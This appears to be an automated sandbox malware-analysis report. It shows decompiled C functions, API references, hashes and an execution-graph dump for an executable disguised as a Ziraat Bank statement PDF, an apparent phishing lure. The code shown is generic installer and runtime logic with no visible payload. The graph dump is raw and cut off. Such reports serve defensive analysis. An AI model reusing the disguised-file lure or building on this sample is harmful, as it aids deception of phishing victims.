                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F37
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 2659869361-2382934351
                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                  				int _t15;
                                                  				long _t16;
                                                  
                                                  				_t15 = _a8;
                                                  				if(_t15 != 0x102) {
                                                  					if(_t15 != 0x200) {
                                                  						_t16 = _a16;
                                                  						L7:
                                                  						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                  							_push(_t16);
                                                  							_push(6);
                                                  							 *0x423734 = _t16;
                                                  							E00404FFF();
                                                  						}
                                                  						L11:
                                                  						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                  					}
                                                  					if(IsWindowVisible(_a4) == 0) {
                                                  						L10:
                                                  						_t16 = _a16;
                                                  						goto L11;
                                                  					}
                                                  					_t16 = E00404F7F(_a4, 1);
                                                  					_t15 = 0x419;
                                                  					goto L7;
                                                  				}
                                                  				if(_a12 != 0x20) {
                                                  					goto L10;
                                                  				}
                                                  				E00404610(0x413);
                                                  				return 0;
                                                  			}






                                                  APIs
                                                  • IsWindowVisible.USER32 ref: 0040566D
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                    • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                  • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                  • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                  • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00405F83(WCHAR* _a4) {
                                                  				WCHAR* _t5;
                                                  				WCHAR* _t7;
                                                  
                                                  				_t7 = _a4;
                                                  				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                  				while( *_t5 != 0x5c) {
                                                  					_push(_t5);
                                                  					_push(_t7);
                                                  					_t5 = CharPrevW();
                                                  					if(_t5 > _t7) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				 *_t5 =  *_t5 & 0x00000000;
                                                  				return  &(_t5[1]);
                                                  			}






                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3976562730
                                                  • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                  • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                  • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                  • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                  				int _v8;
                                                  				int _t12;
                                                  				int _t14;
                                                  				int _t15;
                                                  				CHAR* _t17;
                                                  				CHAR* _t27;
                                                  
                                                  				_t12 = lstrlenA(_a8);
                                                  				_t27 = _a4;
                                                  				_v8 = _t12;
                                                  				while(lstrlenA(_t27) >= _v8) {
                                                  					_t14 = _v8;
                                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                  					_t15 = lstrcmpiA(_t27, _a8);
                                                  					_t27[_v8] =  *(_t14 + _t27);
                                                  					if(_t15 == 0) {
                                                  						_t17 = _t27;
                                                  					} else {
                                                  						_t27 = CharNextA(_t27);
                                                  						continue;
                                                  					}
                                                  					L5:
                                                  					return _t17;
                                                  				}
                                                  				_t17 = 0;
                                                  				goto L5;
                                                  			}










                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                  • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                  • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                  • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                  • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:4.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:2.3%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:53
10b1e22 14730 10a5b2a __wsetlocale_set_cat 6 API calls 14725->14730 14726 10a6117 _wprintf 70 API calls 14728 10b1e17 14726->14728 14727 10b19a7 14727->14725 14729 10a66b0 __fflush_nolock 70 API calls 14727->14729 14734 10b19c3 _memset __output_p_l 14727->14734 14743 10b1dfc __output_p_l 14727->14743 14732 10a4035 _wprintf 9 API calls 14728->14732 14729->14734 14731 10b1e47 14730->14731 14732->14725 14733 10b1f96 14734->14725 14734->14733 14735 10b206c 14734->14735 14736 10b5849 83 API calls __wcstoi64 14734->14736 14734->14743 14745 10af98a 14735->14745 14736->14734 14739 10b20d0 14741 10b2dd1 __output_s_l 103 API calls 14739->14741 14740 10b2dd1 __output_s_l 103 API calls 14742 10b20b0 14740->14742 14741->14733 14742->14739 14742->14743 14743->14726 14743->14733 14744->14727 14746 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 14745->14746 14747 10af99b 14746->14747 14747->14739 14747->14740 16226 10a544e 16227 10a545a _wprintf 16226->16227 16228 10a8834 __lock 70 API calls 16227->16228 16229 10a5461 16228->16229 16230 10a546c DecodePointer 16229->16230 16231 10a5481 DecodePointer 16229->16231 16232 10a5494 16230->16232 16231->16232 16233 10a54b0 16232->16233 16234 10a54a6 EncodePointer 16232->16234 16237 10a54ca 16233->16237 16234->16233 16236 10a54bc _wprintf 16240 10a89b8 LeaveCriticalSection 16237->16240 16239 10a54d1 16239->16236 16240->16239 16249 10ab646 16250 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 16249->16250 16251 10ab6b3 16250->16251 16252 10a6117 _wprintf 70 API calls 16251->16252 16253 10ab6b8 16252->16253 16282 10a732b InitOnceExecuteOnce 16253->16282 16255 10ab6c3 16256 10ab6e9 16255->16256 16258 10ab6c7 16255->16258 16275 10ab6ff __aulldvrm __output_s_l _strlen 16255->16275 16257 10a6117 _wprintf 70 API calls 16256->16257 16259 10ab6ee 16257->16259 16261 10a5b2a __wsetlocale_set_cat 6 API calls 16258->16261 16260 10a4035 _wprintf 9 API calls 16259->16260 16260->16258 16263 10ac238 16261->16263 16262 10ac209 16262->16258 16264 10a6117 
_wprintf 70 API calls 16262->16264 16265 10ac26b 16264->16265 16266 10a4035 _wprintf 9 API calls 16265->16266 16266->16258 16267 10ab40f 105 API calls _write_string 16267->16275 16268 10abda3 DecodePointer 16268->16275 16269 10a8c4b _free 70 API calls 16269->16275 16270 10af98a __isleadbyte_l 80 API calls 16270->16275 16271 10ab471 105 API calls _write_string 16271->16275 16272 10afaad 82 API calls __woutput_p_l 16272->16275 16273 10a8ccd __malloc_crt 70 API calls 16273->16275 16274 10ac23a 16276 10a6117 _wprintf 70 API calls 16274->16276 16275->16258 16275->16262 16275->16267 16275->16268 16275->16269 16275->16270 16275->16271 16275->16272 16275->16273 16275->16274 16277 10abe06 DecodePointer 16275->16277 16279 10abe2e DecodePointer 16275->16279 16281 10ab445 105 API calls _write_multi_char 16275->16281 16278 10ac23f 16276->16278 16277->16275 16280 10a4035 _wprintf 9 API calls 16278->16280 16279->16275 16280->16258 16281->16275 16282->16255 14856 10b0b5f 14857 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 14856->14857 14858 10b0bcc 14857->14858 14859 10a6117 _wprintf 70 API calls 14858->14859 14860 10b0bd1 14859->14860 14882 10a732b InitOnceExecuteOnce 14860->14882 14862 10b0d6a 14867 10a5b2a __wsetlocale_set_cat 6 API calls 14862->14867 14863 10b0d4b 14863->14862 14864 10a6117 _wprintf 70 API calls 14863->14864 14868 10b0d5f 14864->14868 14865 10b0bdc 14865->14862 14865->14863 14866 10a66b0 __fflush_nolock 70 API calls 14865->14866 14877 10b0bf8 __aulldvrm __output_s_l _strlen 14865->14877 14866->14877 14869 10b0d8d 14867->14869 14870 10a4035 _wprintf 9 API calls 14868->14870 14870->14862 14871 10af98a __isleadbyte_l 80 API calls 14871->14877 14872 10b2dd1 103 API calls __output_s_l 14872->14877 14873 10b12fa DecodePointer 14873->14877 14874 10b2e17 103 API calls _write_multi_char 14874->14877 14875 10a8c4b _free 70 API calls 14875->14877 14876 10a8ccd __malloc_crt 70 API calls 14876->14877 14877->14862 14877->14863 14877->14871 14877->14872 14877->14873 
14877->14874 14877->14875 14877->14876 14878 10b135d DecodePointer 14877->14878 14879 10b1382 DecodePointer 14877->14879 14880 10b52c6 82 API calls __cftof 14877->14880 14881 10b2e43 103 API calls _write_string 14877->14881 14878->14877 14879->14877 14880->14877 14881->14877 14882->14865 16334 10b6054 16335 10b65bf _wprintf 16334->16335 16336 10b665a _wprintf 16335->16336 16337 10a8834 __lock 70 API calls 16335->16337 16338 10b65dd 16337->16338 16339 10b65e8 InterlockedDecrement 16338->16339 16340 10b6606 16338->16340 16339->16340 16342 10b65f5 16339->16342 16354 10b6664 16340->16354 16342->16340 16345 10a8c4b _free 70 API calls 16342->16345 16344 10b6654 16346 10a8c4b _free 70 API calls 16344->16346 16345->16340 16346->16336 16347 10a8834 __lock 70 API calls 16348 10b661f 16347->16348 16349 10aeb5d ___removelocaleref 8 API calls 16348->16349 16352 10b662e 16349->16352 16350 10b6647 16357 10b6670 16350->16357 16352->16350 16353 10aea03 ___freetlocinfo 70 API calls 16352->16353 16353->16350 16360 10a89b8 LeaveCriticalSection 16354->16360 16356 10b6613 16356->16344 16356->16347 16361 10a89b8 LeaveCriticalSection 16357->16361 16359 10b6677 16359->16344 16360->16356 16361->16359 15081 10b5f89 15082 10b5f95 _wprintf 15081->15082 15083 10b5fcc _wprintf 15082->15083 15084 10a8834 __lock 70 API calls 15082->15084 15085 10b5fa9 15084->15085 15086 10aec74 __updatetlocinfoEx_nolock 78 API calls 15085->15086 15087 10b5fb9 15086->15087 15089 10b5fd2 15087->15089 15092 10a89b8 LeaveCriticalSection 15089->15092 15091 10b5fd9 15091->15083 15092->15091 16429 10b589d 16432 10b5a6b 16429->16432 16431 10b58ae 16433 10b5a77 _wprintf 16432->16433 16434 10b5a8f 16433->16434 16435 10b5a7f 16433->16435 16460 10a732b InitOnceExecuteOnce 16434->16460 16436 10a60e3 __read_nolock 70 API calls 16435->16436 16459 10b5a84 _wprintf 16436->16459 16438 10b5b40 16440 10a60e3 __read_nolock 70 API calls 16438->16440 16439 10b5a94 16439->16438 16441 10b5aca 16439->16441 16439->16459 16442 10b5b45 
16440->16442 16444 10b5ae9 16441->16444 16447 10b5ad8 16441->16447 16443 10a6117 _wprintf 70 API calls 16442->16443 16445 10b5ae5 16443->16445 16446 10ae482 ___lock_fhandle 72 API calls 16444->16446 16450 10a4035 _wprintf 9 API calls 16445->16450 16445->16459 16448 10b5aef 16446->16448 16449 10a60e3 __read_nolock 70 API calls 16447->16449 16451 10b5b02 16448->16451 16452 10b5b15 16448->16452 16453 10b5add 16449->16453 16450->16459 16454 10b58b7 __chsize_nolock 106 API calls 16451->16454 16455 10a6117 _wprintf 70 API calls 16452->16455 16456 10a6117 _wprintf 70 API calls 16453->16456 16457 10b5b0e 16454->16457 16455->16457 16456->16445 16461 10b5b36 16457->16461 16459->16431 16460->16439 16464 10ae94d LeaveCriticalSection 16461->16464 16463 10b5b3c 16463->16459 16464->16463 15198 10affa1 15199 10aff20 _wprintf 15198->15199 15200 10aff3a 15199->15200 15201 10aff51 15199->15201 15202 10a6117 _wprintf 70 API calls 15200->15202 15213 10a732b InitOnceExecuteOnce 15201->15213 15204 10aff3f 15202->15204 15206 10a4035 _wprintf 9 API calls 15204->15206 15205 10aff56 15207 10a4bf4 __lock_file 71 API calls 15205->15207 15209 10aff4a _wprintf 15205->15209 15206->15209 15208 10aff68 15207->15208 15214 10afd9b 15208->15214 15213->15205 15215 10afdbb 15214->15215 15216 10afef1 15214->15216 15217 10a66b0 __fflush_nolock 70 API calls 15215->15217 15244 10afeab 15216->15244 15252 10b52e1 15216->15252 15218 10afdc1 15217->15218 15221 10a66b0 __fflush_nolock 70 API calls 15218->15221 15232 10afde9 15218->15232 15220 10a5b2a __wsetlocale_set_cat 6 API calls 15222 10aff1e 15220->15222 15223 10afdd2 15221->15223 15249 10aff99 15222->15249 15226 10a66b0 __fflush_nolock 70 API calls 15223->15226 15223->15232 15224 10a66b0 __fflush_nolock 70 API calls 15225 10afe0f 15224->15225 15228 10a66b0 __fflush_nolock 70 API calls 15225->15228 15229 10afe32 15225->15229 15227 10afdde 15226->15227 15230 10a66b0 __fflush_nolock 70 API calls 15227->15230 15231 10afe1b 15228->15231 15229->15216 15233 
10a66b0 __fflush_nolock 70 API calls 15229->15233 15230->15232 15231->15229 15234 10a66b0 __fflush_nolock 70 API calls 15231->15234 15232->15216 15232->15224 15235 10afe58 15233->15235 15236 10afe27 15234->15236 15237 10afe7b 15235->15237 15240 10a66b0 __fflush_nolock 70 API calls 15235->15240 15238 10a66b0 __fflush_nolock 70 API calls 15236->15238 15237->15216 15239 10afe92 15237->15239 15238->15229 15242 10b52c6 __cftof 82 API calls 15239->15242 15241 10afe64 15240->15241 15241->15237 15243 10a66b0 __fflush_nolock 70 API calls 15241->15243 15247 10afea4 15242->15247 15245 10afe70 15243->15245 15244->15220 15246 10a66b0 __fflush_nolock 70 API calls 15245->15246 15246->15237 15247->15244 15248 10ab4ea __vswprintf_helper 103 API calls 15247->15248 15248->15247 15250 10a4c63 _fwprintf 2 API calls 15249->15250 15251 10aff9f 15250->15251 15251->15209 15276 10a732b InitOnceExecuteOnce 15252->15276 15254 10b52eb 15255 10b52ef 15254->15255 15256 10a66b0 __fflush_nolock 70 API calls 15254->15256 15255->15244 15257 10b52ff 15256->15257 15258 10b530a 15257->15258 15259 10b5317 15257->15259 15260 10a6117 _wprintf 70 API calls 15258->15260 15261 10b531c 15259->15261 15269 10b5335 _wprintf 15259->15269 15271 10b530f 15260->15271 15262 10a6117 _wprintf 70 API calls 15261->15262 15262->15271 15263 10b538f 15264 10b5399 15263->15264 15265 10b5416 15263->15265 15267 10b53b5 15264->15267 15272 10b53cc 15264->15272 15266 10a9ce9 __write 103 API calls 15265->15266 15266->15271 15268 10a9ce9 __write 103 API calls 15267->15268 15268->15271 15269->15263 15270 10ae41e __isatty 71 API calls 15269->15270 15269->15271 15273 10b5384 15269->15273 15270->15273 15271->15244 15272->15271 15274 10a7180 __lseeki64 76 API calls 15272->15274 15273->15263 15275 10ae1d7 __getbuf 70 API calls 15273->15275 15274->15271 15275->15263 15276->15254 16548 10a8ea5 16551 10a8eae 16548->16551 16552 10a8834 __lock 70 API calls 16551->16552 16553 10a8eb9 DecodePointer EncodePointer 16552->16553 16556 10a89b8 
LeaveCriticalSection 16553->16556 16555 10a8eac 16556->16555 15404 10a79ca 15405 10a79d7 15404->15405 15411 10a79fd 15404->15411 15408 10a79e5 15405->15408 15412 10a80be FlsGetValue 15405->15412 15413 10a80cc FlsSetValue 15408->15413 15409 10a79f5 15414 10a7893 15409->15414 15412->15408 15413->15409 15416 10a789f _wprintf 15414->15416 15415 10a78b8 15419 10a8c4b _free 70 API calls 15415->15419 15420 10a78c7 15415->15420 15416->15415 15417 10a8c4b _free 70 API calls 15416->15417 15418 10a79a9 _wprintf 15416->15418 15417->15415 15418->15411 15419->15420 15421 10a78d6 15420->15421 15422 10a8c4b _free 70 API calls 15420->15422 15423 10a78e5 15421->15423 15424 10a8c4b _free 70 API calls 15421->15424 15422->15421 15425 10a78f4 15423->15425 15426 10a8c4b _free 70 API calls 15423->15426 15424->15423 15427 10a7903 15425->15427 15428 10a8c4b _free 70 API calls 15425->15428 15426->15425 15429 10a7912 15427->15429 15430 10a8c4b _free 70 API calls 15427->15430 15428->15427 15431 10a7924 15429->15431 15432 10a8c4b _free 70 API calls 15429->15432 15430->15429 15433 10a8834 __lock 70 API calls 15431->15433 15432->15431 15434 10a792c 15433->15434 15435 10a7938 InterlockedDecrement 15434->15435 15436 10a7951 15434->15436 15435->15436 15437 10a7943 15435->15437 15450 10a79b5 15436->15450 15437->15436 15440 10a8c4b _free 70 API calls 15437->15440 15440->15436 15441 10a8834 __lock 70 API calls 15442 10a7965 15441->15442 15443 10a7996 15442->15443 15444 10aeb5d ___removelocaleref 8 API calls 15442->15444 15453 10a79c1 15443->15453 15448 10a797a 15444->15448 15447 10a8c4b _free 70 API calls 15447->15418 15448->15443 15449 10aea03 ___freetlocinfo 70 API calls 15448->15449 15449->15443 15456 10a89b8 LeaveCriticalSection 15450->15456 15452 10a795e 15452->15441 15457 10a89b8 LeaveCriticalSection 15453->15457 15455 10a79a3 15455->15447 15456->15452 15457->15455 15458 10b5bc9 15460 10b5bd5 _wprintf 15458->15460 15459 10b5c10 15461 10b5c28 15459->15461 15462 10b5c18 15459->15462 15460->15459 
15465 10b5c00 15460->15465 15479 10a732b InitOnceExecuteOnce 15461->15479 15463 10a6117 _wprintf 70 API calls 15462->15463 15470 10b5c1d _wprintf 15463->15470 15467 10a6117 _wprintf 70 API calls 15465->15467 15466 10b5cbe 15468 10a6117 _wprintf 70 API calls 15466->15468 15471 10b5c05 15467->15471 15468->15471 15469 10b5c2d 15469->15466 15469->15470 15472 10b5c66 15469->15472 15473 10a4035 _wprintf 9 API calls 15471->15473 15474 10ae482 ___lock_fhandle 72 API calls 15472->15474 15473->15470 15475 10b5c6c 15474->15475 15476 10a6117 _wprintf 70 API calls 15475->15476 15477 10b5c82 __setmode_nolock 15475->15477 15476->15477 15480 10b5cb6 15477->15480 15479->15469 15483 10ae94d LeaveCriticalSection 15480->15483 15482 10b5cbc 15482->15470 15483->15482 15491 10a4bc7 15498 10a4d74 15491->15498 15494 10a4bda 15496 10a8c4b _free 70 API calls 15494->15496 15497 10a4be5 15496->15497 15511 10a4dd2 15498->15511 15500 10a4bcc 15500->15494 15501 10a9b55 15500->15501 15502 10a9b61 _wprintf 15501->15502 15503 10a8834 __lock 70 API calls 15502->15503 15507 10a9b6d 15503->15507 15504 10a9bd2 15541 10a9be9 15504->15541 15506 10a9bde _wprintf 15506->15494 15507->15504 15508 10a9ba6 DeleteCriticalSection 15507->15508 15528 10af8cb 15507->15528 15510 10a8c4b _free 70 API calls 15508->15510 15510->15507 15512 10a4dde _wprintf 15511->15512 15513 10a8834 __lock 70 API calls 15512->15513 15518 10a4ded 15513->15518 15514 10a4e8b 15524 10a4ead 15514->15524 15516 10a4c33 _wprintf 71 API calls 15516->15518 15517 10a4e97 _wprintf 15517->15500 15518->15514 15518->15516 15520 10a4cca 107 API calls __fflush_nolock 15518->15520 15521 10a4e7a 15518->15521 15520->15518 15522 10a4c9d __getstream 2 API calls 15521->15522 15523 10a4e88 15522->15523 15523->15518 15527 10a89b8 LeaveCriticalSection 15524->15527 15526 10a4eb4 15526->15517 15527->15526 15529 10af8d7 _wprintf 15528->15529 15530 10af8eb 15529->15530 15531 10af903 15529->15531 15532 10a6117 _wprintf 70 API calls 15530->15532 15534 10a4bf4 
__lock_file 71 API calls 15531->15534 15537 10af8fb _wprintf 15531->15537 15533 10af8f0 15532->15533 15535 10a4035 _wprintf 9 API calls 15533->15535 15536 10af915 15534->15536 15535->15537 15544 10af85f 15536->15544 15537->15507 15597 10a89b8 LeaveCriticalSection 15541->15597 15543 10a9bf0 15543->15506 15545 10af86e 15544->15545 15546 10af882 15544->15546 15547 10a6117 _wprintf 70 API calls 15545->15547 15549 10a4d10 __flush 103 API calls 15546->15549 15558 10af87e 15546->15558 15548 10af873 15547->15548 15550 10a4035 _wprintf 9 API calls 15548->15550 15551 10af88e 15549->15551 15550->15558 15563 10aa654 15551->15563 15554 10a66b0 __fflush_nolock 70 API calls 15555 10af89c 15554->15555 15567 10b4ddc 15555->15567 15557 10af8a2 15557->15558 15559 10a8c4b _free 70 API calls 15557->15559 15560 10af93a 15558->15560 15559->15558 15561 10a4c63 _fwprintf 2 API calls 15560->15561 15562 10af940 15561->15562 15562->15537 15564 10aa66f 15563->15564 15565 10aa661 15563->15565 15564->15554 15565->15564 15566 10a8c4b _free 70 API calls 15565->15566 15566->15564 15568 10b4de8 _wprintf 15567->15568 15569 10b4e08 15568->15569 15570 10b4df0 15568->15570 15592 10a732b InitOnceExecuteOnce 15569->15592 15571 10a60e3 __read_nolock 70 API calls 15570->15571 15573 10b4df5 15571->15573 15574 10a6117 _wprintf 70 API calls 15573->15574 15578 10b4dfd _wprintf 15574->15578 15575 10b4e92 15576 10a60e3 __read_nolock 70 API calls 15575->15576 15579 10b4e97 15576->15579 15577 10b4e0d 15577->15575 15577->15578 15580 10b4e3f 15577->15580 15578->15557 15581 10a6117 _wprintf 70 API calls 15579->15581 15582 10ae482 ___lock_fhandle 72 API calls 15580->15582 15584 10b4e9f 15581->15584 15583 10b4e45 15582->15583 15585 10b4e58 15583->15585 15586 10b4e63 15583->15586 15587 10a4035 _wprintf 9 API calls 15584->15587 15588 10b4eb3 __wsopen_nolock 74 API calls 15585->15588 15589 10a6117 _wprintf 70 API calls 15586->15589 15587->15578 15590 10b4e5e 15588->15590 15589->15590 15593 10b4e8a 15590->15593 15592->15577 
15596 10ae94d LeaveCriticalSection 15593->15596 15595 10b4e90 15595->15578 15596->15595 15597->15543 16654 10a56d8 16655 10a56e4 _wprintf 16654->16655 16656 10a57d3 16655->16656 16657 10a5766 _siglookup _memmove 16655->16657 16664 10a572d 16655->16664 16658 10a8834 __lock 70 API calls 16656->16658 16659 10a5799 _wprintf 16657->16659 16661 10a6117 _wprintf 70 API calls 16657->16661 16660 10a57da 16658->16660 16662 10a57f2 SetConsoleCtrlHandler 16660->16662 16663 10a5804 16660->16663 16665 10a5916 16661->16665 16662->16663 16666 10a580b 16662->16666 16667 10a582b 16663->16667 16668 10a58b1 DecodePointer 16663->16668 16664->16657 16673 10a7a18 __getptd_noexit 70 API calls 16664->16673 16669 10a4035 _wprintf 9 API calls 16665->16669 16671 10a60e3 __read_nolock 70 API calls 16666->16671 16672 10a588d DecodePointer 16667->16672 16677 10a5869 DecodePointer 16667->16677 16678 10a5835 16667->16678 16670 10a58c7 EncodePointer 16668->16670 16683 10a583d 16668->16683 16669->16659 16670->16683 16676 10a5810 GetLastError 16671->16676 16674 10a58a3 EncodePointer 16672->16674 16672->16683 16681 10a5745 16673->16681 16674->16683 16676->16663 16682 10a587f EncodePointer 16677->16682 16677->16683 16679 10a583a 16678->16679 16680 10a5845 DecodePointer 16678->16680 16679->16672 16679->16683 16680->16683 16684 10a585b EncodePointer 16680->16684 16681->16657 16685 10a8ccd __malloc_crt 70 API calls 16681->16685 16682->16683 16686 